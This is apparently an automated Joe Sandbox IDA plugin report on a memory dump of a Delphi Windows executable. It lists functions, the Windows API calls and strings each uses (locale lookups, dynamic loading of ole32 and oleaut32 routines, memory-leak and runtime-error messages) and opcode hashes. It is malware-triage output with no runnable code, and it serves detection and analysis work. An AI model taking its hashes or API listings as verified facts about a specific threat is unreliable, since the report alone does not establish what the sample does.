                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                        • API String ID: 1599918012-2375825460
                                                                                                                        • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                                                        • Instruction ID: 76787c4e1ec19a6feace258257eea4757923cb7b4020a59c61ce0cee1ed2da91
                                                                                                                        • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                                                        • Instruction Fuzzy Hash: 9F31B571E4021C2AEF25D6B4CC45BDFB7AD4B44380FA501E99608F6185DA74EE448F56
                                                                                                                        Function 029C7F5C Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 029C7F7D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DiskFreeSpace
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1705453755-0
                                                                                                                        • Opcode ID: decc225e8913f5a36f80010b72edd2955afa4d6cef0445e91f91f8cf67aaa865
                                                                                                                        • Instruction ID: fd32302c27b548bcbe01cf445a5a4ac01002763f70dec93d74200615611a44da
                                                                                                                        • Opcode Fuzzy Hash: decc225e8913f5a36f80010b72edd2955afa4d6cef0445e91f91f8cf67aaa865
                                                                                                                        • Instruction Fuzzy Hash: D411D2B5E00209AFDB04CF99C981DEFF7F9EFC8704B14C569A505EB254E671AA01CB91
                                                                                                                        Function 029CA74C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 029CA76A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2299586839-0
                                                                                                                        • Opcode ID: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
                                                                                                                        • Instruction ID: 52649e2d94543fdcb3a30ac6e6b0dabf094fb67293b6e7ce1840d5ae62415530
                                                                                                                        • Opcode Fuzzy Hash: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
                                                                                                                        • Instruction Fuzzy Hash: DEE0D835B0021817D711A9585C90DFA736DA79C310F20417EBD04D7340EEA09D404AE6
                                                                                                                        Function 029CB714 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetVersionExA.KERNEL32(?,029EC106,00000000,029EC11E), ref: 029CB722
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Version
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1889659487-0
                                                                                                                        • Opcode ID: c6a5654ba9a1af36726335ac11077de7c4e3a524c68071aeaf6d80e3a7f6eebe
                                                                                                                        • Instruction ID: 8f612ca79815ce515526f80fa9757fd5e4ac82083390acb2f2f0438fa81760f3
                                                                                                                        • Opcode Fuzzy Hash: c6a5654ba9a1af36726335ac11077de7c4e3a524c68071aeaf6d80e3a7f6eebe
                                                                                                                        • Instruction Fuzzy Hash: 70F0A4B4948301DFCB50DF28D552A2577E9FB89714F54492DE899CB380E7369414CF62
                                                                                                                        Function 029CA798 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,029CBDFA,00000000,029CC013,?,?,00000000,00000000), ref: 029CA7AB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2299586839-0
                                                                                                                        • Opcode ID: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
                                                                                                                        • Instruction ID: a257b154fc7aa7c2b30cf773c51748f6997f27cf2552f32ee9d0a473a483ee8c
                                                                                                                        • Opcode Fuzzy Hash: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
                                                                                                                        • Instruction Fuzzy Hash: 13D05EA630E2642AA220655A2D94DBB5AECDAC97A1F20843EF548C6240D2008C0696F2
                                                                                                                        Function 029C9194 Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LocalTime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 481472006-0
                                                                                                                        • Opcode ID: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
                                                                                                                        • Instruction ID: 45152c4260b64b034d1a1fd20f92c65a22fdc1eac42d1133401519de928671c5
                                                                                                                        • Opcode Fuzzy Hash: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
                                                                                                                        • Instruction Fuzzy Hash: 3AA01100808820028A803B280C0223A3088A880B20FE80F88A8F8802E0EE2E0220A0E3
                                                                                                                        Function 029C20C4 Relevance: .1, Instructions: 94COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                        • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                        • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                        • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                        Function 029CD21C Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 029CD225
                                                                                                                          • Part of subcall function 029CD1F0: GetProcAddress.KERNEL32(00000000), ref: 029CD209
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                        • API String ID: 1646373207-1918263038
                                                                                                                        • Opcode ID: b7105dad7ec26a3bbe78949607e3e30c02f78c17d1a5075c0d1bd95de886f328
                                                                                                                        • Instruction ID: 02cd207f372afc98ab7607856f6110a1d8611392e535ed159427a8e7b1bbb322
                                                                                                                        • Opcode Fuzzy Hash: b7105dad7ec26a3bbe78949607e3e30c02f78c17d1a5075c0d1bd95de886f328
                                                                                                                        • Instruction Fuzzy Hash: C54150B1A843485A561CAB6D7400537BBEADAC97113B1443EB50CCA786DE30B8568F3F
                                                                                                                        Function 029D6E60 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(ole32.dll), ref: 029D6E66
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 029D6E77
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 029D6E87
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 029D6E97
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 029D6EA7
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 029D6EB7
                                                                                                                        • GetProcAddress.KERNEL32(?,CoSuspendClassObjects), ref: 029D6EC7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                        • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                        • API String ID: 667068680-2233174745
                                                                                                                        • Opcode ID: 0ce8dfafc71b997657c61513f0fc8e56a8225c47855fb5cc4d70e025297da2ce
                                                                                                                        • Instruction ID: e45ee5f88b7641320fda0e398172941436605dd5ec3b6aadcb0653f1b4e3b2d1
                                                                                                                        • Opcode Fuzzy Hash: 0ce8dfafc71b997657c61513f0fc8e56a8225c47855fb5cc4d70e025297da2ce
                                                                                                                        • Instruction Fuzzy Hash: F4F050B2A8D711EEBB00BF74BE81837275E95D0604720592D74425D542DBB599205F71
                                                                                                                        Function 029C2530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 029C28CE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message
                                                                                                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                        • API String ID: 2030045667-32948583
                                                                                                                        • Opcode ID: 3742fb4401b4e5de70a67974404fd9fe757c61a33189f38b3ac468f3b5a0d3bc
                                                                                                                        • Instruction ID: aca542ad5797af26e24d9b90f4d4cc539a2b9b7a6ed4c07a1a6a42766c2be988
                                                                                                                        • Opcode Fuzzy Hash: 3742fb4401b4e5de70a67974404fd9fe757c61a33189f38b3ac468f3b5a0d3bc
                                                                                                                        • Instruction Fuzzy Hash: 21A1D330E043948BDB21AB2CCC84B99B6E9EB49750F2440F9DD49AB386CF759985CF52
                                                                                                                        Function 029C252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • An unexpected memory leak has occurred. , xrefs: 029C2690
                                                                                                                        • The unexpected small block leaks are:, xrefs: 029C2707
                                                                                                                        • The sizes of unexpected leaked medium and large blocks are: , xrefs: 029C2849
                                                                                                                        • , xrefs: 029C2814
                                                                                                                        • bytes: , xrefs: 029C275D
                                                                                                                        • Unexpected Memory Leak, xrefs: 029C28C0
                                                                                                                        • 7, xrefs: 029C26A1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                        • API String ID: 0-2723507874
                                                                                                                        • Opcode ID: 71874c310898fdff6a34da30d207bfc2f13abab31681b9129e1f0ede12ebbb9b
                                                                                                                        • Instruction ID: 226e42f1e5d56b7d5cae8dd119779e86c3f62c6592ddf3aecc69de1fc3af70b0
                                                                                                                        • Opcode Fuzzy Hash: 71874c310898fdff6a34da30d207bfc2f13abab31681b9129e1f0ede12ebbb9b
                                                                                                                        • Instruction Fuzzy Hash: 7D71A330E042988FDB21EB2CCC84B99BAE9EB49754F2041E9D9499B281DF754AC5CF52
                                                                                                                        Function 029CBD48 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetThreadLocale.KERNEL32(00000000,029CC013,?,?,00000000,00000000), ref: 029CBD7E
                                                                                                                          • Part of subcall function 029CA74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 029CA76A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Locale$InfoThread
                                                                                                                        • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                        • API String ID: 4232894706-2493093252
                                                                                                                        • Opcode ID: 9fde01a6350bdc980a9953e2817079f2c907db9f6f86896dca05c335cb6e426c
                                                                                                                        • Instruction ID: 463c029e5c5ec361e6536d9a8e657e73c20ba9d1fd10f34a22690d4048fba0a8
                                                                                                                        • Opcode Fuzzy Hash: 9fde01a6350bdc980a9953e2817079f2c907db9f6f86896dca05c335cb6e426c
                                                                                                                        • Instruction Fuzzy Hash: E7613435B002489BDB00EBB8D86069FB7FBABD9300F70943D9105AB745DA35D9098FA7
                                                                                                                        Function 029DAE20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 029DAE40
                                                                                                                        • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 029DAE57
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 029DAEEB
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000002), ref: 029DAEF7
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 029DAF0B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Read$HandleModule
                                                                                                                        • String ID: KernelBase$LoadLibraryExA
                                                                                                                        • API String ID: 2226866862-113032527
                                                                                                                        • Opcode ID: 1387093b9f8e90d4954ee94975080c701c6e4c6154b20d657fbefb858625b301
                                                                                                                        • Instruction ID: 9ca3a80466205a6e0cf9cb8267ffc17b14f1cf1ebe4e677c9bde0e5896baebf4
                                                                                                                        • Opcode Fuzzy Hash: 1387093b9f8e90d4954ee94975080c701c6e4c6154b20d657fbefb858625b301
                                                                                                                        • Instruction Fuzzy Hash: 253174B2A40304BBDB20DF68CD85F5977ACAF45324F108564FA54EB281D374E960EB65
                                                                                                                        Function 029C432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029C43F3,?,?,02A207C8,?,?,029ED7A8,029C655D,029EC30D), ref: 029C4365
                                                                                                                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029C43F3,?,?,02A207C8,?,?,029ED7A8,029C655D,029EC30D), ref: 029C436B
                                                                                                                        • GetStdHandle.KERNEL32(000000F5,029C43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029C43F3,?,?,02A207C8), ref: 029C4380
                                                                                                                        • WriteFile.KERNEL32(00000000,000000F5,029C43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029C43F3,?,?), ref: 029C4386
                                                                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 029C43A4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileHandleWrite$Message
                                                                                                                        • String ID: Error$Runtime error at 00000000
                                                                                                                        • API String ID: 1570097196-2970929446
                                                                                                                        • Opcode ID: c5b2505a97b87ae4d70ef8caade6e2ac9064cdc373c22367a2247d77ef6f0490
                                                                                                                        • Instruction ID: a0155842661a1391bcd0456c9d2450539d6110ac294b5624a683954f00b17af3
                                                                                                                        • Opcode Fuzzy Hash: c5b2505a97b87ae4d70ef8caade6e2ac9064cdc373c22367a2247d77ef6f0490
                                                                                                                        • Instruction Fuzzy Hash: 28F090B0BC434079FE15A7A0AE66F59675C47C4B35F340A0DB625A81C2CBA9D0C5CB3B
                                                                                                                        Function 029CAE4C Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029CACC4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 029CACE1
                                                                                                                          • Part of subcall function 029CACC4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 029CAD05
                                                                                                                          • Part of subcall function 029CACC4: GetModuleFileNameA.KERNEL32(029C0000,?,00000105), ref: 029CAD20
                                                                                                                          • Part of subcall function 029CACC4: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 029CADB6
